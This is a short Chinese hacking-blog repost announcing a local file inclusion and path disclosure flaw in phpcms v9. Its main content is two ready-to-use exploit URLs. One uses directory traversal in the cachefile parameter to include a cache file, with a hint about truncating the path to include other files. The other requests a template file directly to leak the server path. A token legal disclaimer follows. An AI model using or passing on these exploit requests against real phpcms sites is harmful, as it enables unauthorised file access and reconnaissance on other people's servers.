记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

漏洞播报:phpcms v9本地文件包含+爆路径漏洞

2013-04-01 22:15

我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。

Exp: http://www.php0day.com/api.php?op=get_menu&act=ajax_getlist&callback=alert&path=b4dboy&cachefile=../../../fuck

#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。

Exp: http://www.php0day.com/phpcms/modules/attachment/templates/album_dir.tpl.php?author=b4dboy

#暴路径

注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。

 

摘自:http://www.secoff.net/archives/105.html

知识来源: www.cnseay.com/2530/

阅读:101896 | 评论:0 | 标签:漏洞播报 phpcms v9漏洞 phpcmsv9 cms

想收藏或者和大家分享这篇好文章→复制链接地址

“漏洞播报:phpcms v9本地文件包含+爆路径漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云